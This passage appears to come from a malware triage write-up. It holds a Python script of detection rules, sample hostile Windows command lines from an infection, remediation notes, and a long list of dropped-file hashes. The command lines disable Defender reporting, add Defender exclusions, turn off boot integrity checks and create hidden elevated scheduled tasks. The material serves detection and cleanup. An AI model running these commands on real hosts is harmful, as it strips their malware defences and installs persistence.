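    ("defender_policy_tamper", r'reg\s+add\s+[\\"]*HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender'),
    ("defender_exclusion", r"Add-MpPreference\s+-Exclusion"),
    ("encoded_powershell", r"-EncodedCommand\s+([A-Za-z0-9+/=]+)"),
    ("service_acl_lockdown", r"sc\s+sdset\s+(\S+)\s+(\S+)"),
    ("dse_off_boot_entry", r"bcdedit(?:\.exe)?\s+[-/]set\s+\{[0-9A-F-]+\}\s+nointegritychecks\s+1"),
    ("firewall_allow_rule", r"netsh\s+advfirewall\s+firewall\s+add\s+rule"),
    ("elevated_scheduled_task", r"schtasks\s+/create\b.*/rl\s+highest"),
]


def triage(cmdlines):
    """Return [{'tag', 'detail', 'cmdline'}] for every rule that fires."""
    findings = []
    for line in cmdlines:
        for tag, pattern in RULES:
            m = re.search(pattern, line, re.IGNORECASE)
            if not m:
                continue
            detail = ""
            if tag == "encoded_powershell":
                detail = decode_encoded_command(m.group(1))
            elif tag == "service_acl_lockdown":
                denied = denied_service_rights(m.group(2))
                if not denied:  # an sdset that adds no deny ACE is not a lockdown
                    continue
                detail = f"{m.group(1)}: deny {denied}"
            findings.append({"tag": tag, "detail": detail, "cmdline": line})
    return findings


# Constructed sample input: command lines copied from the process list above.
SAMPLE_CMDLINES = [
    'REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64',
    'schtasks /CREATE /TN "gBVIaQAaO" /SC once /ST 06:57:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\\Windows\\rss\\csrss.exe" enable=yes',
    'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\\Windows\\rss\\csrss.exe" /TN csrss /F',
    'C:\\Windows\\system32\\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1',
    "sc sdset WinDefender " + WINDEFENDER_SDDL,
    "powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force",
    "chcp 1251",  # benign control line; must match nothing
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_CMDLINES):
        print(f"[{hit['tag']}] {hit['detail'] or hit['cmdline'][:80]}")
```

Two things the output makes actionable. The deny ACE leaves Administrators with WRITE_DAC and WRITE_OWNER, so an elevated `sc sdset WinDefender` with a standard service descriptor restores the ability to stop and delete the service. The bcdedit line that `dse_off_boot_entry` flags belongs to the {71A3C7FC-F751-4982-AEC1-E958357E6813} entry that the same chain also makes the default with `-timeout 0` and `recoveryenabled 0`, so the host keeps booting with integrity checks disabled until that entry is removed with `bcdedit /delete {71A3C7FC-F751-4982-AEC1-E958357E6813}` and the original default restored.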
Network
Files
| MD5 | ea88003340e5c3427dbed1a2a115fb5a |
| SHA1 | 6fc984cd823eff878210a0d87881487e6bcd6358 |
| SHA256 | 3b26274dbec957f3e68379eb12d85ef58da96a5937550b9283a92a06bf064b40 |
| SHA512 | 79136ebac0a11b0e68ceb04b90061c2faebaeb995ef263024d3180fe6630ee8588a3128f235c7d75354487a061e7536d53d575c4fee55bc6473f567141cb908c |
memory/2292-766-0x00000000001E0000-0x00000000001E1000-memory.dmp
C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe
| MD5 | 5c32752cfce75744cd66d603e0c680b8 |
| SHA1 | 71b73ad5b48fad802b0cdbe5e4acddc11d26e488 |
| SHA256 | 02b735e8ab496e355674a68beb835c74c807173de62e7ffd4b107d62b66fbfd4 |
| SHA512 | 27c308cc34e18663a498a4db69c5be68afb464b4f3dc68970628539dda726f0b33e42d8b84b9e1f0001f65ef3d409aed800a8f1fb88a75488a556a06541195dc |
C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe
| MD5 | b0301e179b08746a7aa2bbecaf555ff5 |
| SHA1 | 95fdbcc0d737f3606f1c014863eff0db58a0125a |
| SHA256 | 509b88b80b1c89c6bdae42f0d09155972703cf1b30b35b4ead23246e8ef9fcbe |
| SHA512 | fcab305752c209c666c7244f0ac09413c3f6165838386826f092b360f3d7c9bae364205e788c240fab05aaffef0c33cb065d618cbcdc136ebfbb1a45b1ac6392 |
C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
| MD5 | 06786032d6cc5a11e2f6da0d01d0fee1 |
| SHA1 | 5fb9b78ae5e23eb38e8926fb7b2882898c2d25a2 |
| SHA256 | d0ddf6b4e60b0dc3879246ef732326a6d904e3f3839b6a9ebd9fc50c37f24f56 |
| SHA512 | 013c342fe84e543ea3aea15d783227ffac07f9ed078393139c72be8d590f179c228b613c67d6670cd6f36b72997fb34060a1ef5bd3edcdc8f28839337b45dd16 |
C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
| MD5 | fe55f926a9947d6807e5e6853efc374a |
| SHA1 | 97780e01a70a9374d375f314e9afb7611b1d0d4a |
| SHA256 | 7bec46cefd80dbc3b8054f1f63a57b3cbf58416874c35f43b630afb423d932e5 |
| SHA512 | af006a9ce2ec923dc661753c56682bb58f0933cb6654bf70de2d0411a9e7cce98bf94daab1c174cdbc91a9c854c2bc128ee0e39556cc278242aaa39162034c65 |
memory/2292-816-0x000007FEFCEF0000-0x000007FEFCF5C000-memory.dmp
C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe
| MD5 | 0234c41bd48ddb74380867ef32308305 |
| SHA1 | c21436996b83b2c9d06188f7283479e3b358c19e |
| SHA256 | 86a3e8a80e64e5d3d877b1d66fe67d5469624089c92fde9cb7857395ea4c877a |
| SHA512 | 1edde5e29f518ad449aa52b03ced01f2bea49ac9e71ab0b0ac8c0ec9d10384716532a5dec99425861b06e8376b8841e10bc5db34edd71e121cbdfb1a2c7f865c |
memory/2032-823-0x0000000000400000-0x0000000002D35000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp
| MD5 | 724157721f3f7976fd3448e828d6f1ad |
| SHA1 | ff2f221fb99d83d95f03611d99d918ec42f6af18 |
| SHA256 | b274a31511bea7b3b80fdf349de355c97016a9b29f5f74b72735ca297c466ccb |
| SHA512 | f0888a38f86a4ee9cc26cf37dec97932756559340e21b39f9caa90cb569bef8962ad45172f2db8add5361fbb33f8e11253f6af9affb54c5eeb8b6e21af5ef637 |
memory/2320-821-0x0000000000400000-0x0000000002D35000-memory.dmp
memory/1872-827-0x0000000000CD0000-0x000000000126B000-memory.dmp
memory/2320-829-0x00000000031C5000-0x00000000031DB000-memory.dmp
memory/1940-830-0x0000000004F20000-0x000000000580B000-memory.dmp
memory/2320-839-0x00000000003B0000-0x00000000003BB000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-ERSDB.tmp\_isetup\_isdecmp.dll
| MD5 | a813d18268affd4763dde940246dc7e5 |
| SHA1 | c7366e1fd925c17cc6068001bd38eaef5b42852f |
| SHA256 | e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64 |
| SHA512 | b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4 |
memory/708-843-0x0000000001030000-0x000000000167A000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-ERSDB.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
| MD5 | 174031d6644c1e8cf4db13828e4e9d18 |
| SHA1 | 6d30b7d8b4eb124cbd209a97cafec0e831181c7a |
| SHA256 | 8f665fb2f27500b98ae54941f3a4fababc8a7823674902d2cda25980311e7fb1 |
| SHA512 | 191e2b815fac0d195592f71e5ea9a7a448cc6ad6402ca630b1dbc554d271ab602e8e35de743bee2e029b5a7b5fda751bcdc5315bd67dc0678132ba5d0c8b3ecb |
memory/2220-844-0x0000000000220000-0x0000000000254000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-ERSDB.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/2292-849-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1536-850-0x0000000000D40000-0x0000000001AC3000-memory.dmp
memory/2352-813-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2220-853-0x0000000000400000-0x0000000002D38000-memory.dmp
memory/1872-854-0x0000000076FA0000-0x0000000076FA2000-memory.dmp
memory/2032-810-0x0000000002E80000-0x0000000002F80000-memory.dmp
\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
| MD5 | 9fa91de66cf74a1520626276220d409e |
| SHA1 | ab9c8558ca1d6f70da9871ea1ae6618c2f511502 |
| SHA256 | 6427be51e77ddc8574764fbcc67b16c2dd723e047f235b450dccabe38d1dad62 |
| SHA512 | 10ed2bfd81e807175766fbe191b97da60c2f61d4836ac2528dd5c2f264797c4d439c49fa783dd7546806d9ee77dad5814b0df93330ed7b1a102b495f1ce3831f |
\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
| MD5 | a86879a597bc09e67af9e1d7c3f9a031 |
| SHA1 | dd19fa0979b76eab6ff537d66c04d2c5491752ec |
| SHA256 | c558768b2a3df2f24e5363fbc6a77af95c45d8633f2985e2a21d7b4f90e57b99 |
| SHA512 | 24ace1596b74044583d2918ccc0670a7cee7f8262178f56b4e63215d97b482d81c8914fa59627931ca533531777c5bab805faee1701d333978fbeb67329e02e9 |
memory/1940-857-0x0000000000400000-0x0000000003118000-memory.dmp
\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
| MD5 | e5ad162d8d5b7b2bc128be8a6086204c |
| SHA1 | 4a32e65b9c64fb8bca70b71282d5cb0830322b31 |
| SHA256 | ffa6f07574ae218de1379939075c1c8bf9d7cb62adbbd6ce84f4e4c65dfbf00c |
| SHA512 | af79b8cf6e6d330e77bb6585cf60680c3d1476e87bf0d7d59c5de6c4eeae47218b3c0a674478e480e1db2e1a7a4624e51790e1d814eb6de24d7be32d80777128 |
\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
| MD5 | ec0e4a749a6fd8d576392b27ae656825 |
| SHA1 | 9b11bf432641241eb6cbf808d68776de44f5d978 |
| SHA256 | b3944fdc6f59813d326cfe978bc0f621aa071bfa027c9a2d475893d9fc8c99d4 |
| SHA512 | 748e1ba7f191eabdb73f3ba660e0feac91799ced225af6297b4fe7b1b8ed722f848fbfe10d45d4896ee4c6fc52e54af8fef25c3a3e00ce4a78f756ca4ac2c9b6 |
\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
| MD5 | bf548da3d2a643b6e5f8d11a20df1c82 |
| SHA1 | 294d9f15ef7de299128d78c3a720e64b4642b434 |
| SHA256 | 1ae5b8afd87fcdc0e8271f66b93725fa7e7bd4314a997d6f1a6426877c10bbfb |
| SHA512 | 38d7a1b3e42ef1ea9d840d74eceeda00e7ff916e4f6c6066aab5b8c70463be88fa83a1221544e21a879f976a0bce5f4bc7e8ae486ca68cae125a040ed3ac1aa4 |
\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
| MD5 | a72f3c064195be421f41e08ca2256fec |
| SHA1 | 1626c61666ef9d48b3cc13b9e6e41edea821b64b |
| SHA256 | f12e376fb243002d129569a58c0db4ff2eabb78fd908a3cf9815121339ef27af |
| SHA512 | 451fd4fad61f55593d425c9f4abc379092b99eb8bf1942d5d6d3822cc178022f3d1c900b39e9911cc8f7c07ad5fd84657f3896036ec7cd57fa4f5c9836ad4329 |
\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
| MD5 | 9fbe52f3300b186bb1e7e00c40367920 |
| SHA1 | 4379143de05d20bb0a5d8edc1d18bd3c51f46794 |
| SHA256 | b5f111a7eab0df5b8c6d419ca714c9e177b5879ab439892e140508d4002083cc |
| SHA512 | 91d3766bfb5fd68b416aace8a0093376e2d685665913df52d49586a451ecdb2c5a355500ab3e7a5790e3d159b7c76bd4d6b324923bc3215c442bf5fc2e34307d |
memory/1536-867-0x0000000000080000-0x0000000000081000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
| MD5 | 012099c12d7c59813e5f50e70a823ccf |
| SHA1 | 7abce396aeaee1e59d99bd6a1e07b47c57d7deb7 |
| SHA256 | 9e858c52cdd629e9df5d47c09d5fb345de5b37c80652338c52ef1364b33f36a9 |
| SHA512 | e4256f93bd344262c74c723c97c1ba4f2f4d644b15c1ed73a07d3fea3e3a0a5dc52591890a6f56bf417b0308ca52889459a53af2136ad146fae1bcf88398f81b |
C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
| MD5 | fb305eba57628d1e343b997b7b81258f |
| SHA1 | 00f3b32d47e95092e1983dc7103031e3e75982f6 |
| SHA256 | eb7ed6e3e8078eb146e5d2221e31d0defebc93af2b454a1814166e686ff07c34 |
| SHA512 | fc67c0d0f7588120279902835c82ec2c3e1b4a9639c2aa2ccbccb2d8d1224802e76bab63742950e187f15db811a672a87a86a16b4831315c3331b52017362974 |
memory/1940-802-0x0000000004B20000-0x0000000004F18000-memory.dmp
C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
| MD5 | c627d2a1d2783ea60a492b448e361a0e |
| SHA1 | 7e209828a734b48cd51a77faa18b70ed7fd866f2 |
| SHA256 | f70bacfd983935d7d95889245833815eb1727f07eb7cf9a3410541ad63b44a32 |
| SHA512 | 1f7cc3244cddb5bc5edd0035ef25462c687cbc3ae4082eca727162a56f6f0a3bc553faba328f36533a1b9ee249977021a64d3605102a6deec392e2c05c67b642 |
memory/1536-876-0x0000000000080000-0x0000000000081000-memory.dmp
memory/1536-902-0x0000000000140000-0x0000000000141000-memory.dmp
memory/1536-909-0x0000000000150000-0x0000000000151000-memory.dmp
memory/1536-907-0x0000000000150000-0x0000000000151000-memory.dmp
memory/1536-910-0x0000000000D40000-0x0000000001AC3000-memory.dmp
memory/1536-904-0x0000000000140000-0x0000000000141000-memory.dmp
memory/1536-899-0x0000000000130000-0x0000000000131000-memory.dmp
memory/1536-897-0x0000000000130000-0x0000000000131000-memory.dmp
memory/1536-894-0x00000000000A0000-0x00000000000A1000-memory.dmp
memory/1536-892-0x00000000000A0000-0x00000000000A1000-memory.dmp
memory/1536-889-0x0000000000090000-0x0000000000091000-memory.dmp
memory/1536-887-0x0000000000090000-0x0000000000091000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
| MD5 | d9fa5b4c08df7b1f1ab4cb741e2432bc |
| SHA1 | 9011088560af38df737caa34f54c339b108b59c3 |
| SHA256 | e0eee2cf9990ac70cf9393ffc3cf85b14b1dca6af942c0906a13c77579441294 |
| SHA512 | e07e24d289330c3a371cfbc8819a47e65a17e52dfea97fa3e0398b628aeb9567e26cc8be55a523edea5e424f0fe286a347d2b74b19f6cd2042012f4a04f76558 |
\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
| MD5 | 3f2656a2981b37d3688816fbf4389887 |
| SHA1 | 6e7c94115fe6f4d0542060beafe76c86b1e2ce84 |
| SHA256 | 689dddd819b05a08ad9c2c08332f32cb20ca731f97b31fb4206cacb1d618f248 |
| SHA512 | 6dace0b33669480c5eecaab8b4cd29de1c79c190e37a5862441cfd1b3d317b209cf2f31045e6dfdbce3ee2d15c3b1fbf9ac9ff191b9c1f581a3c693f77d49bfa |
\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
| MD5 | 1503a956e66567f307021cdc4e669b46 |
| SHA1 | 32e911d882374c2b87fe75f5241c36afecd324c2 |
| SHA256 | 1dcb64ab4a7195a3e18605e7d3aeb38eaac9cfa30b3cda9f3ae162b96ac4602f |
| SHA512 | 7d684bcd17a181e3f71e4d6063150f5b7817c6baa740d2c20bbd6d4040971535f5520201bd7d0fb14915e374e882a96d25a4fed7ebb35d9c8b23365521a4e768 |
C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
| MD5 | 7b277ab71a851405aaf60c533cf5bbea |
| SHA1 | fd6c728381960fbd281fe47b97a5de57cfec21cd |
| SHA256 | 6cd2c8434c81ddddd2b6d699966b5006706a31d2ce4fae9ccdd12ef25978660d |
| SHA512 | e747103152254e1f0b7d70da8c6149631de3c169f9c9f9880e85dea35c7fe6120a2bccf1859c214b13f7a6e9a3450192d8808d00dd96720675e8114032474775 |
C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
| MD5 | 18ccc0609227850ba953c82fd892b3e6 |
| SHA1 | ed371cd14dec36be3ec49a56637f8a442bb19f6b |
| SHA256 | 90438c6e50182c4e7e23b6f6e5e37cdb35c121892d5c10c2d788a4c85b25cf62 |
| SHA512 | 730902282293e71a4ce3a44aa207b1788c4240944232367d90684f7c69709a4c7af3c42ea463e1fd91316decb17d93051de86fa98a03cd1e2af0b96a46c1bc2a |
\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
| MD5 | c19eee5d355d1bbbd7b7392a6425a189 |
| SHA1 | 03462bf0ea46d55a7d478f512176cc47cd4827b0 |
| SHA256 | c4b00008efe3d349dad90f7dc034589bf3b4fea607a89457f33229628aa2d675 |
| SHA512 | 25a420a25554a9fbf4ec6fe5a34fa3ebd0bda80e8e70f3b66c92e839d17dfa6f035443d3040104447fea35d71222e1ee95423c25e46714a6e51e799ac820a92b |
memory/1536-885-0x0000000000090000-0x0000000000091000-memory.dmp
memory/1228-920-0x0000000010000000-0x00000000105EF000-memory.dmp
memory/1536-884-0x0000000000080000-0x0000000000081000-memory.dmp
C:\Windows\System32\GroupPolicy\GPT.INI
| MD5 | 7cc972a3480ca0a4792dc3379a763572 |
| SHA1 | f72eb4124d24f06678052706c542340422307317 |
| SHA256 | 02ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5 |
| SHA512 | ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7 |
C:\Windows\System32\GroupPolicy\Machine\Registry.pol
| MD5 | cdfd60e717a44c2349b553e011958b85 |
| SHA1 | 431136102a6fb52a00e416964d4c27089155f73b |
| SHA256 | 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f |
| SHA512 | dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8 |
memory/2032-770-0x0000000000220000-0x000000000022B000-memory.dmp
memory/2292-769-0x00000000001F0000-0x00000000001F1000-memory.dmp
memory/1872-932-0x0000000002800000-0x0000000002801000-memory.dmp
memory/1872-933-0x0000000002A70000-0x0000000002A71000-memory.dmp
memory/1872-931-0x0000000000CC0000-0x0000000000CC1000-memory.dmp
memory/1872-930-0x00000000027F0000-0x00000000027F1000-memory.dmp
memory/708-929-0x00000000737C0000-0x0000000073EAE000-memory.dmp
C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe
| MD5 | 7cb4f29ae8fc679cac0801aea56c637b |
| SHA1 | 471f16cdf5680ee3243e1f7fc193bc5e35a88901 |
| SHA256 | e32f91a2e28817b36da21e044fa272f1fb254cdb5d5554287b5b7151ccad394a |
| SHA512 | 209cc8fe9800a513530c8c6d6a8d6246eb886fbf8aec694148f4936fc4fa94635bde71d8859746cc1877055f82e5703ac66430e5d6aa6328b42014133a96b228 |
C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe
| MD5 | e631b0568f72b53017e1a086fcbf0fa0 |
| SHA1 | 9171af6578f75088d6b58e3148d6886d8b93d66a |
| SHA256 | 3642d46de45bb032639bd478ffb9343ce4600000ae513f5bf3ad4f10329c12e4 |
| SHA512 | 3d12779c6bd2e2c92db6068521f71e4ddcedcbf699c5eebbddb10859e58db579b4115269e1185eda54b23e1cab15b56a9a2e7f8358c3c4c1ba620939cfee37ee |
memory/2292-955-0x0000000076DB0000-0x0000000076F59000-memory.dmp
memory/2292-954-0x000007FEFCEF0000-0x000007FEFCF5C000-memory.dmp
memory/2292-953-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1208-956-0x0000000002FA0000-0x0000000002FB6000-memory.dmp
C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe
| MD5 | 8901f25ebcf2ff0db1a32825aff4c69f |
| SHA1 | f0d5f1f70dffcfc99ce35cdd0a5a10193765ceeb |
| SHA256 | 642825309e79f1eb9962a9e15dcc43d122f16790d0a91b627001f5236b234721 |
| SHA512 | 4a3533e917d241f693c360f6288a72fa9ce3f917ba14965adb88baefbc380c05aa97f6ac781bd40bdbbaae67e876abfc91b518f0d6115a11751ad07a701a29d3 |
memory/2032-957-0x0000000000400000-0x0000000002D35000-memory.dmp
C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe
| MD5 | c2ef805490108de7287cfc176d42476e |
| SHA1 | 557e0dbe1661579496d900e0efd90e1660c5c485 |
| SHA256 | 57cc3426fb9d1dfff31b3074f85f1d7b1625a4e29af0590ad05ef0bbdfbd31ed |
| SHA512 | 3b319d8cea8b2b0d9ddb8561afce61f4c255fc25a5613ba77b9462cc27d556b5fa6ddee5409461ca51fefbb28021f58c5b9dfe471c1343a8be4e1ee053aeeb15 |
memory/708-966-0x00000000066D0000-0x00000000069AC000-memory.dmp
C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe
| MD5 | 50f83c5a0e15f5030b758024da774685 |
| SHA1 | 715427ee4c537bc16c770bbc1b8ba92368de7d28 |
| SHA256 | 841a3640c2c8a68809763bfa074330e3e991bd0fb803e1e18b9f80128bdc3519 |
| SHA512 | 213044e261aad0a5c01617a30b5377499694ac7519119a1942c5c6835e11fa3a3a2a87c0b3bb0343cb289762e51609d10fb3a77ff83028045b61233414dc827e |
memory/452-995-0x0000000004A90000-0x0000000004E88000-memory.dmp
memory/1940-996-0x0000000000400000-0x0000000003118000-memory.dmp
memory/1940-997-0x0000000004B20000-0x0000000004F18000-memory.dmp
memory/1744-1000-0x000000006E480000-0x000000006EA2B000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d14c451344e5a1d715a747b384466894 |
| SHA1 | b959d8f9b0210826cbafe3f7a431680e818a51d4 |
| SHA256 | e8ac6ab24d8c4f4770f82c4e3328c99a9f6013a4048ba15bed68ffa42e063519 |
| SHA512 | 3d58a358c01cabbee9581409c89a18322d0b894b6a863957e0e195cf06add80c05189ee86ed639074e3f04ca07166e8032d4ee07a8eb0b85fefc1d83fd744e1c |
memory/2220-1018-0x0000000061E00000-0x0000000061EF3000-memory.dmp
memory/1536-1029-0x0000000000D40000-0x0000000001AC3000-memory.dmp
C:\Windows\system32\GroupPolicy\gpt.ini
| MD5 | a62ce44a33f1c05fc2d340ea0ca118a4 |
| SHA1 | 1f03eb4716015528f3de7f7674532c1345b2717d |
| SHA256 | 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a |
| SHA512 | 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732 |
\Windows\rss\csrss.exe
| MD5 | 55a87651d3c0d209b72a185858107636 |
| SHA1 | b7b1e85c9be7db398888b9e60f853b83d493b31e |
| SHA256 | 270641bf5acce59ff39d9c75f06f8c9dbc0bd1ce81b6268fcae518ecc70b0e19 |
| SHA512 | 703745e4b0c374fbed52d7e26fec90de7fcbf2a0892b9e916b2e9208c58100cedd8e9f0912c14fc08bc6f841593750cad30aa90a28057413445f7b3858568e5f |
\Windows\rss\csrss.exe
| MD5 | 111592899d04c8439a8b116841fa1af5 |
| SHA1 | 843d8ff565cc72a4b24271dbe7b815502930776e |
| SHA256 | c92c4737f3e32827e12ba6ae412a339868ba76f7da00de7ddf0f5e48e19b6735 |
| SHA512 | 853d47b3fbddbb1f7fa08822765e7ab1a7e86db795a9b6db18138c8bd9317fccd36e1463fd4db504ae92feb1a1cd33050bea31b976c6aa4bac26295b6ef58674 |
C:\Windows\rss\csrss.exe
| MD5 | 388b9f1ae46a681a3d5076f3292ab3f8 |
| SHA1 | 7c6cef8c58e3cadf648e55e646f591283899adc3 |
| SHA256 | fba80de3f16a7dab80c6fba110634f71fce046ad2b73e1fe1a98d64ca652c368 |
| SHA512 | 1903bc31dd4e48af8eb3318f47a2f904aaa5c13a91d389eeafa3bc8bcfad52cd84479f4e53fc9c3bb7330c7b4dfee03ff1bf5eab5ea806b319f27ad8ea052d0f |
memory/452-1071-0x0000000004A90000-0x0000000004E88000-memory.dmp
memory/452-1072-0x0000000000400000-0x0000000003118000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | b4ce1d7f83a59c1c7caa5fa6459a8e3b |
| SHA1 | 90f0287b63d63e8eeca9d045a9369cc955c2d9fc |
| SHA256 | 88d2f8953de4adec36e5d83a7bbe36fbb43afb43c50a0341dae4239a10c8aa1d |
| SHA512 | 9a9d358e0eadfe2d7391d8d228c58906485732acba9671356174ca07a5260221bac0b4ba4bfb708c3fcce8a34b5e886f4e51f096fa99f13100479749871e4c5e |
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | bdc08885fc53a990ea29f5167c1f5a8b |
| SHA1 | b26b70961805617551473f1303566aedbd75bdf3 |
| SHA256 | 8aa27f72fa142a8f4a106c64fc4d933d9260f5831a3e8f2cbd1d39bd2c510928 |
| SHA512 | 64780d666e699c36c79c5014c0f6ff8db293e5de1058a5d192eece94e626fc500b1cecb6d9e097b394e04cfe41c66537aa6767b5acc1aad9092791375039584b |
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | e8f48a38f2870850759a80d8670440c1 |
| SHA1 | bd66ab9816a739f220f10511be2df49c2bf499bd |
| SHA256 | 590516d897c29fb1ac56dbe5f991af1b6ea1c1869dd12a7186257ee667983435 |
| SHA512 | 34a03f70e7cd79bc54e32f7cd8d84d02816f2ebe127ade4767eb1d368e525d620d6982cdf8d58a1d8eaf6354da74b14b527fd4c2f56951b6da7edd934831a30a |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | f0616fa8bc54ece07e3107057f74e4db |
| SHA1 | b33995c4f9a004b7d806c4bb36040ee844781fca |
| SHA256 | 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026 |
| SHA512 | 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c |
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | d0fab78e5be946230bc6344be5fb2d12 |
| SHA1 | db8d38be9964fae896674cec3c72f20e69ca9947 |
| SHA256 | ae818952a5abf42f76c0ee4c504e90b8b01d8c9a00d7ae0b1425ee34a64ff6b9 |
| SHA512 | 38a69333c5bc12a06059226d40a0cf30f3c7d8f6576dd2b7069d431a6b03e3aa3d3b8122483d318dd43d7fabf80756bdb156bc7a2702f843e663c7f3b2022bde |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 0b5f899f2ca2ab3030784fe09201d882 |
| SHA1 | 23083f00b60c4507f1818723d6dcb5fa9d7e9dfc |
| SHA256 | f7596721e2175e4aab68914b2993d7c0cb97f8869a50931ba4455ef27f4fe089 |
| SHA512 | cfb93cba7f045bfdb72761fa956f68062cfaac315e562787018f33626c88477a0d4e4985f6bccdc9241e5b413ce316afeaf218214d1702e93f7aae1eb20976af |
